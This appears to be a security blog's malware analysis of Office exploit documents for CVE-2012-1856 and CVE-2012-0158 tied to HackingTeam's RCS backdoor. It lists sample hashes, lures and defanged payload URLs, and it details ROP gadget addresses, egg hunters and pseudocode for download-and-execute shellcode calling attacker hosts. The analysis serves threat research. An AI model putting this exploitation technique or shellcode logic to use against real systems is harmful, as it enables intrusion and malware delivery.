Part 1: Overview
Quite some time ago (more than a year before the HackingTeam leaks) I came across a number of interesting exploit samples that make use of CVE-2012-1856. With the recent HackingTeam leaks a number of connections can now be made between this vulnerability discovered by VUPEN and the usage of HackingTeam’s RCS backdoor.
CVE-2012-1856 is a use-after-free vulnerability in the ‘TabStrip’ ActiveX Control present in the ‘MSCOMCTL.OCX’ library. This vulnerability has first been discovered by Nicolas Joly of VUPEN and has been patched by Microsoft on 2012-08-14 in MS12-060. A weaponized exploit is being offered to customers of VUPEN:
In-depth technical analysis of the vulnerability and a fully functional
exploit including ASLR/DEP bypass are available through the VUPEN BAE
(Binary Analysis & Exploits) portal [http://seclists.org/bugtraq/2012/Sep/47]
Identified samples
The number of samples that seem to exploit the CVE-2012-1856 ‘TabStrip UAF’ appears to be limited. Even though no concrete statistics seem to be publically available, only a very limited amount of samples could be recovered from VirusTotal.
The following list contains an overview of the samples that could be identified as weaponized CVE-2012-1856 samples. More samples that trigger the CVE-2012-1856 vulnerability have been identified, although these samples did not result in an infected attempt when tested with Office 2007 and 2010. These samples are likely just PoCs.
Doc family – Possibly developed by an independent party
To begin with, two quite similar samples that are likely developed by a party not related to HT or VUPEN. These samples trigger the TabStrip UAF and contain a malicious executable, however an infection attempt could not be observed. These samples possibly use ROP gadgets from a library that was not present on any of the testing machines. The other identified samples use ROP gadgets present in the MSCOMCTL.OCX library.
These samples also do not seem to be as universal as the other identified weaponized exploits. A user first has to enable Macro’s before the TabStrip use-after-free can be triggered, this is not the case with the other samples.
Doc sample 1: China-Xi dan Amerika-Obama, Winnie the Pooh.doc
| MD5 | 0a363f2f61bc2483d8cd85722328b804 (VT / cryptam) |
| First seen on VirusTotal | 2013-07-14 09:12:45 UTC |
| Extracted executable using foremost (MD5) | acdbb0d5bea262396f83e53240941c6a (VT) |
| Lure | Indonesian article about Chinese censorship of Winnie the Pooh and Tigger |
Doc sample 2 – Elise dropper
| MD5 | 78761220af4d57c17e08f7d1bf72906e (VT / cryptam) |
| First seen on VirusTotal | 2013-06-24 09:02:38 UTC |
| Extracted executable using foremost (MD5) | 6631d67f8baedfc0a244a74cf1411057 (VT) |
| Lure | Conference of Philippine Air Force |
XLS family
This family of samples uses an Excel file for exploiting CVE-2012-1856. These XLS samples have a certain key characteristics in common like for example:
- A shared creation time of 2010-07-28 08:30:50
- The same placement of ActiveX controls within the excel sheet
- Similar shellcode
XLS sample 1: document.xls – Hacking Team demo
| MD5 | c1289a1d9f8a3f4c17e4edac905020a8 (VT / cryptam) |
| First seen on VirusTotal | 2015-07-07 16:13:39 UTC |
| Downloads payload from | hxxp://rcs-demo.hackingteam.it/246.exe |
Note: This sample originates from the HackingTeam dump and has possibly been used for demonstration purposes.
XLS sample 2: 0000000025.xls
| MD5 | 308934332780eae73f438183b4f05c67 (VT / cryptam) |
| First seen on VirusTotal | 2013-06-28 11:41:52 UTC |
| Downloads payload from | hxxp://62.109.31.96/0000000025/0000000025.exe |
Note: The IP address 62.109.31.96 is known to be Hacking Team related.
XLS sample 3: Reduced Prices.xls
| MD5 | 49b5a24a4b7b8fffc5abb5584c8102a9 (VT / cryptam) |
| First seen on VirusTotal | 2014-02-25 11:32:15 UTC |
| Downloads payload from | hxxp://prounion.mooo.com/files/wdlps32.exe |
| Last modified by | jl |
| Code Page | Windows Korean (Unified Hangul Code) |
| Lure | Pricelist of home appliances |
Note: According to Scumware.org the file previously hosted at prounion.mooo.com/files/wdlps32.exe has an MD5 hash of b6021aadc9379c73bdc4ba55bbb6d4d2
XLS sample 4: test.xls
| MD5 | d9f61471d3460d33e27a0f5e15fd9af3 (VT / cryptam) |
| First seen on VirusTotal | 2014-03-10 13:28:18 UTC |
| Downloads payload from | hxxp://avast-update.com/files/wdlps32.exe |
| Last modified by | jl |
| Code Page | Windows Korean (Unified Hangul Code) |
| Lure | List of companies located in North Korea |
Note: According to Scumware.org the executable hosted at avast-update.com/files/wdlps32.exe was the same file as the one hosted at prounion.mooo.com/files/wdlps32.exe.
RTF sample – CVE-2012-0158 / CVE-2012-1856 combo-exploit
| MD5 | f0b1e810bb28bb98bafa9f2865a83d0f (VT / cryptam) |
| First seen on VirusTotal | 2012-10-15 07:13:57 UTC |
| Downloads payload from | hxxp://www.l7steps.com/stage2 |
| File Type | RTF |
| Creation date | 2012-04-20 01:51:00 |
| Default languages | French – France |
Note: According to an email present in the Hacking Team archive the domain ‘l7steps.com’ (83.111.56.188) has been used as an RCS Collector.
l7steps.com as mentioned in a Hacking Team e-mail
Part 2a: Closer look at XLS sample 1 – Hacking Team demo
| MD5 | c1289a1d9f8a3f4c17e4edac905020a8 (VT / cryptam) |
| First seen on VirusTotal | 2015-07-07 16:13:39 UTC |
| Downloads payload from | hxxp://rcs-demo.hackingteam.it/246.exe |
This exploit sample is an Excel file which contains two ActiveX controls which are used to exploit CVE-2012-1856.
Configurations targeted
Only Excel 2007 installations before the MS12-027 patch seem to be targeted. No infected attempt or crash has been observed when other configurations were being tested.
| OFFICE 2007 VERSION | TARGETED VULNERABILITY |
|---|---|
| MS12-027 not installed | CVE-2012-1856 |
CVE-2012-1856 exploitation + 1st stage shellcode
Exploiting this use-after-free vulnerability does not seem to be very trivial. However, the developer of this exploit has found a way to exploit this vulnerability without scripting (AS/JS/VBS), stack pivot or the use of a heap spray.
When Page Heap is enabled an access violation can be observed at a call dword ptr [ecx+8] instruction that can be controlled by the attacker.
Access Violation with Page Heap enabled
Right before this controlled indirect call a push eax operation takes place. At this point eax contains a reference to the heap chunk (0x0360908c) that contains the 1st stage egg hunter shellcode. The address of this shellcode will thus be pushed on to the stack.
A ROP gadget at address 0x275bc6e0 is being called to redirect the execution flow. (The address 0x275bc6e0 is present as a byte sequence at the address 0x275b89a + 0x8 inside of the MSCOMCTL.OCX library.) This ROP gadget contains a pop esi instruction that will be used to pop the return address – pushed on to the stack by the call instruction – from the stack.
After popping the return address from the stack no further obstacles exists to gain code execution after the ret 0x275b instruction.
At the end of the ROP gadget instead of returning to the instruction following the indirect call the ROP gadget will return to the heap chunk controlled by the attacker.
By popping the return address created by the call dword ptr instruction from the stack and returning to the controlled heap chunk there is no need for a stack pivot.
After the execution flow has been redirected a 1st stage egg hunter shellcode is being executed to locate the main shellcode in memory. This egg hunter shellcode uses NtAccessCheckAndAuditAlarm to locate the sequence of ‘0x90419041’ dwords preceding the main shellcode. The egg hunter used in this exploit is quite standard and only capable of performing 32 bit syscalls.
A fairly commented version of the egg hunter can be found on onlinedisassembler.com.
Main shellcode analysis
The main shellcode is preceded by a large byte sequence which functions as a tag for the egg hunter. This byte sequence consists of 64 repetitions of 0x41904190. The main shellcode is an unencrypted download&execute shellcode that uses GetProcAddress to retrieve the addresses of required functions.
The main behavior of the shellcode can be visualized using the following pseudocode:
// Extraction of the first function addresses happens using a loop.
// This has been left out in the pseudocode for simplicity.
CreateProcessA = GetProcAddress(kernel32, "CreateProcessA");
GetEnvironmentVariableA = GetProcAddress(kernel32, "GetEnvironmentVariableA");
ExitProcess = GetProcAddress(kernel32, "ExitProcess");
LoadLibraryA = GetProcAddress(kernel32, "LoadLibraryA");
LoadLibraryA("urlmon");
URLDownloadToFileA = GetProcAddress(urlmon, "URLDownloadToFileA");
GetEnvironmentVariableA("TEMP", &tmpFolder, 0xf8);
&tmpFolder += "\O1_YVt1.exe";
URLDownloadToFileA(0x0, &"hxxp://rcs-demo.hackingteam.it/246.exe", &tmpFolder, 0x0, 0x0)
CreateProcessA(&tmpFolder, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, &lpStartupInfo, &lpProcessInformation);
ExitProcess(0x0);
Part 2b: Closer look at CVE-2012-0158 / CVE-2012-1856 combo-exploit
| MD5 | f0b1e810bb28bb98bafa9f2865a83d0f (VT / cryptam) |
| First seen on VirusTotal | 2012-10-15 07:13:57 UTC |
| Downloads payload from | hxxp://www.l7steps.com/stage2 |
| File Type | RTF |
| Creation date | 2012-04-20 01:51:00 |
| Default languages | French – France |
The second sample being analyzed is an RTF file which exploits CVE-2012-1856. This file contains 4 ActiveX controls, an analysis indicates that these ActiveX controls are used to exploit two separate vulnerabilities: CVE-2012-0158 and CVE-2012-1856
| ActiveX Control (In order of appearance) | Likely Role |
|---|---|
| MSComctlLib.TabStrip.2 | Used to store the main shellcode |
| MSComctlLib.TreeCtrl.2 | CVE-2012-0158 trigger |
| MSComctlLib.TabStrip.2 | CVE-2012-1856 trigger |
| MSComctlLib.Toolbar.2 | Used to replace the heap chunk freed by CVE-2012-1856 |
The presence of a CVE-2012-0158 trigger in this sample is a strong indicator that the exploit code for this sample has been written after the MS12-027 patch. A creation date of 2012-04-20 helps in supporting this theory, even though timestamps of samples are not always the most reliable source of information.
The presence of French language settings could indicate an exploit author of French origin. Please note this could also be an attempt to mask the identity of the real exploit developer.
Configurations targeted
Depending on the installation of the MS12-027 patch CVE-2012-0158 or CVE-2012-1856 will be exploited. Only Office 2007 seems to be targeted.
| Office 2007 version | Targeted vulnerability |
|---|---|
| MS12-027 not installed | CVE-2012-0158 |
| MS12-027 installed | CVE-2012-1856 |
CVE-2012-0158 and 1st stage shellcode
The first vulnerability exploited in this sample is CVE-2012-0158, a stack-based buffer overflow affecting the TreeView and ListView ActiveX controls. This vulnerability is well-known for being heavily exploited in the wild by different actors
After taking control of the instruction pointer, code execution starts from the stack with a “push esp # ret 8” (0x275ef44a) ROP gadget. After pushing the stack pointer on to the stack execution will be redirected to stack memory storing the 1st stage shellcode.
the address of the push esp # ret gadget and the start of the egg hunter shellcode seen from the RTF file
Egg hunter
A 1st stage egg hunter shellcode is being executed to locate the main shellcode in memory. This egg hunter shellcode uses NtAccessCheckAndAuditAlarm to locate a sequence of ‘0x42904290’ dwords in front of the main shellcode. The egg hunter contains functionality to execute both the 32-bit and 64-bit syscall of NtAccessCheckAndAuditAlarm.
A fairly commented version of the egg hunter can be found on onlinedisassembler.com.
CVE-2012-1856 and code execution
If exploitation of the CVE-2012-0158 stack buffer overflow vulnerability did not occur an attempt at exploiting the CVE-2012-1856 ‘TabStrip’ use-after-free vulnerability takes place. (Please note that this attempt only seems to take place when the malicious document is being closed.)
Redirecting execution flow
Two ActiveX controls are being used to exploit the CVE-2012-1856 vulnerability. One of the TabStrip.2 controls and the Toolbar.2 control are crafted in such a way that the execution flow can be hijacked by the attacker at closure of the document. The freed heap chunk is being replaced by a byte sequence that is present multiple times in the Toolbar.2 control.
The execution flow can once again be hijacked at a call dword ptr [ecx+8] instruction. Right before this controlled indirect call the known push eax operation takes place. At this point eax points to the heap chunk (0x039e4654) that contains the 1st stage egg hunter shellcode and will thus be pushed on to the stack. Consequently a ROP gadget at address 0x275bb639 is being called using the previously mentioned call dword ptr [ecx+8] instruction. (The value of 0x275bb639 is a legitimate byte sequence stored in the MSCOMCTL.OCX library at the address 0x27589c50 + 8.)
The ROP-gadget at address 0x275bb639 contains an indirect call (call dword ptr [eax+8]) instruction itself.
At this call dword ptr [eax+8] instruction a 2nd ROP gadget located at the address 0x275cee48 is being called (The value 0x275cee48 is a legitimate byte sequence being stored in the MSCOMCTL.OCX library at the address 0x27588748 + 8)
After these nested indirect calls two return addresses and the address of the controlled heap chunk are stored on the stack.
This 2nd ROP-gadget located at address 0x275cee48 contains a ret 4 instruction, which allows the attacker to pop the first address from the stack as return address and will increase esp by an additional 4 bytes.
This behavior makes it possible for the 1st ROP gadget to return in to the heap chunk that is controlled by the attacker.
After returning from both gadgets the execution flow will be redirected to the heap chunk controlled by the attacker. (This address was originally pushed on the stack before the first call dword ptr instruction.)
The egg hunter used in the CVE-2012-1856 part of the sample is almost exactly the same as the egg hunter used in combination with the CVE-2012-0158 part of this exploit sample.
Main shellcode and payload
The main shellcode is preceded by a large byte sequence which functions as a tag for the egg hunter. This byte sequence consists of 128 repetitions of 0x42904290. This shellcode attempts to download another shellcode to memory and uses ROR-13 hashing to check retrieved function names. A disassembly of the main shellcode can once again be found on onlinedisassembler.com
The following functions are being resolved using ROR-13 hashing:
| Function | ROR-13 hash |
|---|---|
| LoadLibraryA | 0xec0e4e8e |
| VirtualAlloc | 0x91afca54 |
| InternetOpenA | 57e84429 |
| InternetOpenUrlA | 7e0fed49 |
| InternetReadFile | 5fe348b8 |
The main behavior of the shellcode can be visualized using the following pseudocode:
LoadLibraryA("wininet");
lpBuffer = VirtualAlloc(0x0, 0x3000, 0x10000, 0x40);
hInternet = InternetOpenA(0x0, 0x0, 0x0, 0x0. 0x0)
hFile = InternetOpenUrlA(hInternet, &"hxxp://www.l7steps.com/stage2", 0x0, 0x0, 0x0, 0x0);
while (&numberOfBytesRead == 0x100) {
InternetReadFile(hFile, lpBuffer, 0x100, &numberOfBytesRead);
lpBuffer += 0x100;
}
jump lpBuffer;
The shellcode attempts to download a payload from from hxxp://www.l7steps.com/stage2. At time of writing this file was offline, although it is likely that this payload contained shellcode capable of dropping the actual backdoor.
Conclusion
It is plausible to assume that VUPEN’s CVE-2012-1856 has been used multiple times to drop HackingTeam’s RCS backdoor. At which scale is unknown, although this vulnerability does not seem to be as embraced by APT actors as for example CVE-2012-0158.
A number of similarities between the XLS samples and the RTF sample are noticeable despite the presence of different shellcodes:
- The same vulnerability is being exploited, which only seems to have been used in the wild at a limited scale.
- A comparable technique is being used to take over the execution flow at the controlled CALL DWORD PTR [ECX+8] instruction.
- The analyzed egg hunters increment in steps of 0x7c.
- The analyzed main shellcodes start with similar tag sequences.
Answering the question of which HackingTeam customers might have deployed the mentioned exploit samples is irrelevant for this analysis.
Acknowledgements
I would like to thank Edwin Engels and Mark Loman for providing samples and giving feedback on a part of this analysis.
blog.ropchain.com – Security blog 